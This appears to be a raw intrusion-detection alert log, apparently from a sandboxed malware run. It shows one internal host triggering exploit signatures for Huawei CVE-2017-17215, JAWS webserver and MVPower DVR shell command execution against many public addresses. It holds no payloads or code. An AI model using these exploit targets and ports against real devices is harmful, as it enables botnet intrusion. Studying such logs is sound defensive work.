                    06/01/24-18:15:56.307937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3802637215192.168.2.2341.116.27.9
                    06/01/24-18:15:54.273986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806237215192.168.2.23156.238.73.159
                    06/01/24-18:15:56.308533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550837215192.168.2.23156.141.78.170
                    06/01/24-18:15:54.238679TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5936880192.168.2.2345.9.82.52
                    06/01/24-18:15:54.255942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231637215192.168.2.23156.170.125.222
                    06/01/24-18:15:54.274260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003237215192.168.2.23156.42.136.63
                    06/01/24-18:15:53.246794TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4364680192.168.2.23121.59.20.215
                    06/01/24-18:15:55.261750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4972637215192.168.2.23156.207.173.145
                    06/01/24-18:15:56.224422TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5718680192.168.2.2317.87.254.21
                    06/01/24-18:15:55.265615TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4609480192.168.2.23128.10.35.101
                    06/01/24-18:15:54.255707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174637215192.168.2.23156.110.247.233
                    06/01/24-18:15:53.239740TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6010480192.168.2.2358.199.54.70
                    06/01/24-18:15:54.240320TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4991280192.168.2.23116.128.48.224
                    06/01/24-18:15:54.254417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354437215192.168.2.2341.244.158.164
                    06/01/24-18:15:55.265997TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3297280192.168.2.2331.160.243.24
                    06/01/24-18:15:55.263203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054637215192.168.2.23156.58.71.89
                    06/01/24-18:15:53.237843TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5186680192.168.2.2398.108.66.200
                    06/01/24-18:15:54.239975TCP2025883ET EXPLOIT MVPower DVR Shell UCE5552080192.168.2.23118.167.64.175
                    06/01/24-18:15:53.239781TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5007880192.168.2.23129.193.114.98
                    06/01/24-18:15:55.265049TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3386480192.168.2.23167.84.216.177
                    06/01/24-18:15:54.274796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042837215192.168.2.23197.99.171.142
                    06/01/24-18:15:54.254454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753037215192.168.2.23156.234.39.13
                    06/01/24-18:15:55.262354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703037215192.168.2.23197.210.56.52
                    06/01/24-18:15:54.252168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919437215192.168.2.23156.227.20.171
                    06/01/24-18:15:55.266529TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3861280192.168.2.23162.196.145.224
                    06/01/24-18:15:55.267705TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3559880192.168.2.23203.183.146.124
                    06/01/24-18:15:54.275058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117637215192.168.2.23156.148.74.163
                    06/01/24-18:15:54.252117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620437215192.168.2.2341.37.220.142
                    06/01/24-18:15:56.288192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305437215192.168.2.23197.121.209.235
                    06/01/24-18:15:56.305939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089237215192.168.2.23197.254.140.119
                    06/01/24-18:15:53.241257TCP2025883ET EXPLOIT MVPower DVR Shell UCE3835480192.168.2.238.194.32.207
                    06/01/24-18:15:54.252555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960037215192.168.2.23197.171.180.102
                    06/01/24-18:15:55.262753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378437215192.168.2.23197.161.107.182
                    06/01/24-18:15:54.255482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798837215192.168.2.23156.149.206.65
                    06/01/24-18:15:54.275029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224637215192.168.2.2341.73.11.125
                    06/01/24-18:15:56.307479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015037215192.168.2.23156.63.174.230
                    06/01/24-18:15:55.265734TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5145880192.168.2.2383.218.78.62
                    06/01/24-18:15:54.238596TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3293680192.168.2.23189.82.218.132
                    06/01/24-18:15:53.240154TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3942080192.168.2.2331.70.83.31
                    06/01/24-18:15:54.274661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869437215192.168.2.2341.95.142.163
                    06/01/24-18:15:54.255200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671837215192.168.2.2341.45.246.39
                    06/01/24-18:15:53.240463TCP2025883ET EXPLOIT MVPower DVR Shell UCE3771480192.168.2.23206.121.1.240
                    06/01/24-18:15:55.265647TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5688080192.168.2.238.125.254.226
                    06/01/24-18:15:54.273833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035837215192.168.2.23156.251.190.176
                    06/01/24-18:15:54.275278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616037215192.168.2.23156.221.125.6
                    06/01/24-18:15:54.273878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021837215192.168.2.23156.211.151.21
                    06/01/24-18:15:53.241470TCP2025883ET EXPLOIT MVPower DVR Shell UCE5847680192.168.2.23223.81.79.132
                    06/01/24-18:15:54.251714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545237215192.168.2.2341.61.54.93
                    06/01/24-18:15:55.233612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742037215192.168.2.23197.83.168.107
                    06/01/24-18:15:55.267380TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4012880192.168.2.23149.50.188.155
                    06/01/24-18:15:53.238996TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5807680192.168.2.23142.5.237.169
                    06/01/24-18:15:55.259394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630037215192.168.2.23197.159.67.191
                    06/01/24-18:15:54.275397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869637215192.168.2.23156.9.202.179
                    06/01/24-18:15:54.252427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990637215192.168.2.23156.113.109.247
                    06/01/24-18:15:55.261204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242637215192.168.2.23156.177.250.156
                    06/01/24-18:15:54.251796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756637215192.168.2.2341.179.71.43
                    06/01/24-18:15:56.245720TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4959480192.168.2.238.18.108.124
                    06/01/24-18:15:55.260018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553837215192.168.2.23197.48.200.253
                    06/01/24-18:15:54.275438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004237215192.168.2.23197.5.246.90
                    06/01/24-18:15:54.274916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4699037215192.168.2.23156.108.83.196
                    06/01/24-18:15:53.239527TCP2025883ET EXPLOIT MVPower DVR Shell UCE3436080192.168.2.2392.228.245.159
                    06/01/24-18:15:56.306870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933437215192.168.2.23197.141.16.244
                    06/01/24-18:15:54.252084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453237215192.168.2.23197.159.210.112
                    06/01/24-18:15:56.245249TCP2025883ET EXPLOIT MVPower DVR Shell UCE5257080192.168.2.23204.99.201.107
                    06/01/24-18:15:54.253050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440237215192.168.2.2341.152.169.18
                    06/01/24-18:15:54.254853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760637215192.168.2.23197.110.203.35
                    06/01/24-18:15:54.275631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905837215192.168.2.23156.4.146.242
                    06/01/24-18:15:53.247003TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4078280192.168.2.23170.90.134.85
                    06/01/24-18:15:53.238429TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3948680192.168.2.23202.24.92.234
                    06/01/24-18:15:53.239991TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3291480192.168.2.2345.238.94.61
                    06/01/24-18:15:54.240221TCP2025883ET EXPLOIT MVPower DVR Shell UCE5353480192.168.2.23219.191.228.10
                    06/01/24-18:15:55.261422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199237215192.168.2.2341.57.81.216
                    06/01/24-18:15:55.267015TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5765080192.168.2.23107.137.173.67
                    06/01/24-18:15:54.253905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519837215192.168.2.23156.145.248.27
                    06/01/24-18:15:56.308000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924837215192.168.2.2341.95.96.115
                    06/01/24-18:15:56.245498TCP2025883ET EXPLOIT MVPower DVR Shell UCE4213680192.168.2.2342.133.131.181
                    06/01/24-18:15:55.261159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766837215192.168.2.2341.223.205.90
                    06/01/24-18:15:54.256722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261637215192.168.2.2341.56.241.40
                    06/01/24-18:15:54.253014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521637215192.168.2.23156.37.13.98
                    06/01/24-18:15:56.307292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915837215192.168.2.23156.169.205.31
                    06/01/24-18:15:54.254086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988237215192.168.2.23197.121.136.81
                    06/01/24-18:15:53.238153TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5683880192.168.2.23117.200.77.204
                    06/01/24-18:15:56.246812TCP2025883ET EXPLOIT MVPower DVR Shell UCE4389680192.168.2.2338.25.43.161
                    06/01/24-18:15:54.255976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103637215192.168.2.23156.69.248.105
                    06/01/24-18:15:54.274464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547037215192.168.2.2341.101.61.245
                    06/01/24-18:15:55.266159TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5689080192.168.2.2361.112.73.122
                    06/01/24-18:15:54.239818TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5003680192.168.2.2399.223.38.236
                    06/01/24-18:15:56.245784TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5908680192.168.2.2363.169.38.14
                    06/01/24-18:15:54.239201TCP2025883ET EXPLOIT MVPower DVR Shell UCE4488880192.168.2.23161.43.121.185
                    06/01/24-18:15:53.239114TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4437280192.168.2.23117.241.145.89
                    06/01/24-18:15:54.275477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563237215192.168.2.2341.160.105.72
                    06/01/24-18:15:53.239819TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4477880192.168.2.2325.87.20.30
                    06/01/24-18:15:55.268528TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3664480192.168.2.23208.229.32.27
                    06/01/24-18:15:53.240505TCP2025883ET EXPLOIT MVPower DVR Shell UCE5021880192.168.2.23159.209.163.86
                    06/01/24-18:15:55.262933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342037215192.168.2.23197.247.117.7
                    06/01/24-18:15:55.268035TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4955080192.168.2.2319.122.215.223
                    06/01/24-18:15:53.240919TCP2025883ET EXPLOIT MVPower DVR Shell UCE3387880192.168.2.23112.152.48.8
                    06/01/24-18:15:54.255507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729637215192.168.2.23197.132.75.186
                    06/01/24-18:15:54.253499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468437215192.168.2.23197.65.247.219
                    06/01/24-18:15:54.252202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101437215192.168.2.23156.167.5.201
                    06/01/24-18:15:54.251939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561237215192.168.2.2341.125.186.113
                    06/01/24-18:15:54.240725TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3297480192.168.2.23190.157.211.94
                    06/01/24-18:15:55.265213TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3939480192.168.2.23196.27.40.199
                    06/01/24-18:15:54.239497TCP2025883ET EXPLOIT MVPower DVR Shell UCE4519080192.168.2.2342.11.130.136
                    06/01/24-18:15:53.237611TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5745080192.168.2.23138.193.26.70
                    06/01/24-18:15:55.266592TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5072480192.168.2.23106.231.83.190
                    06/01/24-18:15:54.240458TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3507880192.168.2.23157.151.151.63
                    06/01/24-18:15:56.254225TCP2025883ET EXPLOIT MVPower DVR Shell UCE4664880192.168.2.2364.170.221.237
                    06/01/24-18:15:54.254785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617037215192.168.2.23156.47.174.21
                    06/01/24-18:15:55.265935TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5548280192.168.2.2395.179.61.207
                    06/01/24-18:15:54.254747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557237215192.168.2.2341.109.78.181
                    06/01/24-18:15:54.255124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593237215192.168.2.23156.240.0.43
                    06/01/24-18:15:55.266247TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3637880192.168.2.2312.230.123.8
                    06/01/24-18:15:56.246669TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3508280192.168.2.2383.217.140.1
                    06/01/24-18:15:54.254489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037837215192.168.2.23156.88.210.161
                    06/01/24-18:15:54.238344TCP2025883ET EXPLOIT MVPower DVR Shell UCE4675480192.168.2.2352.191.152.237
                    06/01/24-18:15:55.262801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386237215192.168.2.23197.162.38.43
                    06/01/24-18:15:54.274024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260237215192.168.2.23156.150.168.22
                    06/01/24-18:15:53.241011TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4649080192.168.2.2393.152.148.219
                    06/01/24-18:15:55.260064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268837215192.168.2.2341.69.68.105
                    06/01/24-18:15:55.267599TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4998280192.168.2.23179.119.22.120
                    06/01/24-18:15:53.240242TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3492280192.168.2.23158.4.130.100
                    06/01/24-18:15:56.307801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240837215192.168.2.23156.2.53.201
                    06/01/24-18:15:53.247036TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5636280192.168.2.2344.214.37.113
                    06/01/24-18:15:54.253169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129637215192.168.2.23197.189.238.220
                    06/01/24-18:15:56.244558TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5633480192.168.2.2345.33.63.82
                    06/01/24-18:15:54.239716TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5227480192.168.2.23106.72.36.51
                    06/01/24-18:15:55.263799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766837215192.168.2.2341.148.200.185
                    06/01/24-18:15:54.238811TCP2025883ET EXPLOIT MVPower DVR Shell UCE5677480192.168.2.23145.92.78.73
                    06/01/24-18:15:56.254840TCP2025883ET EXPLOIT MVPower DVR Shell UCE5014480192.168.2.23109.252.239.250
                    06/01/24-18:15:56.288115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486437215192.168.2.23156.126.149.65
                    06/01/24-18:15:54.275795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768437215192.168.2.23197.116.0.109
                    06/01/24-18:15:54.254976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605037215192.168.2.23156.13.177.93
                    06/01/24-18:15:55.259625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452637215192.168.2.2341.179.125.3
                    06/01/24-18:15:56.307625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887837215192.168.2.23197.19.181.180
                    06/01/24-18:15:54.274503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659037215192.168.2.23156.226.16.66
                    06/01/24-18:15:54.237719TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5441080192.168.2.23147.89.17.146
                    06/01/24-18:15:55.263359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509637215192.168.2.23156.11.8.51
                    06/01/24-18:15:55.263544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3447037215192.168.2.23156.51.243.47
                    06/01/24-18:15:56.244906TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3737280192.168.2.2357.33.20.180
                    06/01/24-18:15:54.274630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016837215192.168.2.23156.58.162.34
                    06/01/24-18:15:55.263597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774037215192.168.2.23156.108.129.83
                    06/01/24-18:15:54.256596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139637215192.168.2.23197.204.51.155
                    06/01/24-18:15:56.306118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619237215192.168.2.23156.29.82.209
                    06/01/24-18:15:56.245457TCP2025883ET EXPLOIT MVPower DVR Shell UCE4160280192.168.2.23104.124.188.94
                    06/01/24-18:15:55.260121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560237215192.168.2.2341.198.182.7
                    06/01/24-18:15:54.274950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020037215192.168.2.23197.17.222.156
                    06/01/24-18:15:53.240112TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4771480192.168.2.23204.135.242.117
                    06/01/24-18:15:54.240667TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3903080192.168.2.23217.30.58.227
                    06/01/24-18:15:54.256207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565837215192.168.2.23156.125.82.99
                    06/01/24-18:15:55.268493TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4422480192.168.2.2317.7.166.25
                    06/01/24-18:15:55.259707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286037215192.168.2.23156.86.90.224
                    06/01/24-18:15:56.246355TCP2025883ET EXPLOIT MVPower DVR Shell UCE4764680192.168.2.23108.218.98.173
                    06/01/24-18:15:56.308137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875237215192.168.2.23197.198.161.205
                    06/01/24-18:15:54.253620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602437215192.168.2.23156.8.32.149
                    06/01/24-18:15:54.252728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759237215192.168.2.23156.94.219.6
                    06/01/24-18:15:53.240978TCP2025883ET EXPLOIT MVPower DVR Shell UCE5355880192.168.2.2381.48.62.152
                    06/01/24-18:15:54.253278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5896637215192.168.2.23156.212.207.12
                    06/01/24-18:15:53.241607TCP2025883ET EXPLOIT MVPower DVR Shell UCE5288680192.168.2.2380.252.121.45
                    06/01/24-18:15:53.239929TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3654680192.168.2.23196.44.130.154
                    06/01/24-18:15:54.239533TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4136280192.168.2.2341.189.31.68
                    06/01/24-18:15:55.232018TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4344480192.168.2.23106.211.139.161
                    06/01/24-18:15:56.307512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427637215192.168.2.23156.52.23.232
                    06/01/24-18:15:53.240886TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3973280192.168.2.23128.151.195.102
                    06/01/24-18:15:53.241435TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4876280192.168.2.23191.185.132.251
                    06/01/24-18:15:53.240062TCP2025883ET EXPLOIT MVPower DVR Shell UCE5150080192.168.2.23187.75.110.93
                    06/01/24-18:15:54.240025TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3368880192.168.2.2341.108.232.85
                    06/01/24-18:15:56.245427TCP2025883ET EXPLOIT MVPower DVR Shell UCE5901880192.168.2.23219.119.143.84
                    06/01/24-18:15:55.259667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364237215192.168.2.23197.239.183.143
                    06/01/24-18:15:56.288088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379637215192.168.2.2341.199.32.68
                    06/01/24-18:15:54.254259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980637215192.168.2.23197.33.181.12
                    06/01/24-18:15:54.238224TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4952480192.168.2.23133.130.243.96
                    06/01/24-18:15:53.239557TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5623480192.168.2.2395.239.226.123
                    06/01/24-18:15:53.241160TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4295080192.168.2.23160.171.210.51
                    06/01/24-18:15:53.240794TCP2025883ET EXPLOIT MVPower DVR Shell UCE3321080192.168.2.23155.78.6.227
                    06/01/24-18:15:56.255231TCP2025883ET EXPLOIT MVPower DVR Shell UCE4409280192.168.2.2398.147.145.185
                    06/01/24-18:15:53.237898TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3748080192.168.2.2392.126.90.34
                    06/01/24-18:15:56.306153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983437215192.168.2.23197.148.128.8
                    06/01/24-18:15:56.308094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630237215192.168.2.23156.166.201.246
                    06/01/24-18:15:54.273749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749037215192.168.2.2341.197.206.174
                    06/01/24-18:15:54.237993TCP2025883ET EXPLOIT MVPower DVR Shell UCE4705480192.168.2.23213.99.204.125
                    06/01/24-18:15:54.253940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668637215192.168.2.23197.78.230.78
                    06/01/24-18:15:56.307179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702237215192.168.2.23197.84.49.239
                    06/01/24-18:15:54.253854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203037215192.168.2.23197.154.217.12
                    06/01/24-18:15:55.264788TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5673680192.168.2.23220.57.15.58
                    06/01/24-18:15:55.263107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230437215192.168.2.2341.136.68.81
                    06/01/24-18:15:56.244830TCP2025883ET EXPLOIT MVPower DVR Shell UCE5496880192.168.2.2390.145.31.137
                    06/01/24-18:15:54.238439TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3620880192.168.2.23147.135.44.218
                    06/01/24-18:15:54.251747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038037215192.168.2.2341.29.240.127
                    06/01/24-18:15:54.274833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678037215192.168.2.23156.186.16.118
                    06/01/24-18:15:53.241729TCP2025883ET EXPLOIT MVPower DVR Shell UCE3449280192.168.2.23123.28.179.254
                    06/01/24-18:15:55.267076TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3718480192.168.2.23168.201.130.187
                    06/01/24-18:15:55.266307TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4097280192.168.2.23192.241.94.64
                    06/01/24-18:15:54.257094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185037215192.168.2.2341.201.77.122
                    06/01/24-18:15:53.239596TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5105080192.168.2.23108.85.135.218
                    06/01/24-18:15:56.255251TCP2025883ET EXPLOIT MVPower DVR Shell UCE4771280192.168.2.2387.44.98.223
                    06/01/24-18:15:54.251831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577037215192.168.2.23197.81.225.105
                    06/01/24-18:15:54.275663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409237215192.168.2.23197.165.142.230
                    06/01/24-18:15:53.238606TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5529280192.168.2.23140.5.76.153
                    06/01/24-18:15:56.245457TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4160280192.168.2.23104.124.188.94
                    06/01/24-18:15:56.246218TCP2025883ET EXPLOIT MVPower DVR Shell UCE4793880192.168.2.2352.6.122.212
                    06/01/24-18:15:54.251612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883637215192.168.2.23156.141.233.124
                    06/01/24-18:15:55.266913TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4329680192.168.2.23181.7.89.239
                    06/01/24-18:15:55.272625TCP2025883ET EXPLOIT MVPower DVR Shell UCE3418480192.168.2.23169.128.130.40
                    06/01/24-18:15:53.241529TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5865480192.168.2.2389.243.242.221
